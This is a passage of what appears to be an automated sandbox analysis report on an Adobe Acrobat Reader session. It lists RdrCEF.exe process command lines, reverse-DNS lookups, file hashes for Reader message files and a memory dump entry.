,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A1B32E6BFF3D6BD688D3C53C33B8F5D7 --renderer-client-id=2 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=61A9138E4E86BAF34FFA3427729A9FD5 --mojo-platform-channel-handle=2328 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AA4ED39242504687DB94B5C37CF6053B --mojo-platform-channel-handle=1860 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=85D31170BCF205141A5177E5DE883CE7 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=85D31170BCF205141A5177E5DE883CE7 --renderer-client-id=6 --mojo-platform-channel-handle=2428 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D7581F74912E58562A63E4C799ECB66A --mojo-platform-channel-handle=2528 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.4.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | b30d3becc8731792523d599d949e63f5 |
| SHA1 | 19350257e42d7aee17fb3bf139a9d3adb330fad4 |
| SHA256 | b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3 |
| SHA512 | 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | 752a1f26b18748311b691c7d8fc20633 |
| SHA1 | c1f8e83eebc1cc1e9b88c773338eb09ff82ab862 |
| SHA256 | 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131 |
| SHA512 | a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5 |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | 40101759c16d1569a80d090fe8dd2092 |
| SHA1 | ce177e9d12145f9154896ac51e6239318c6fe265 |
| SHA256 | f7f3f20f34bd0de6f154922f8aded50fc6eeb8e44205e729d41220cfd278fd2c |
| SHA512 | 0e0680ac7a5d2a1c8db3e9a8731083cd5637af0129911553ca960ee0205b69f70680594a4f74728490be848dfb98a851ca7cefde7fedc6747f8b024111c76cde |
memory/2456-121-0x000000000B1D0000-0x000000000B47B000-memory.dmp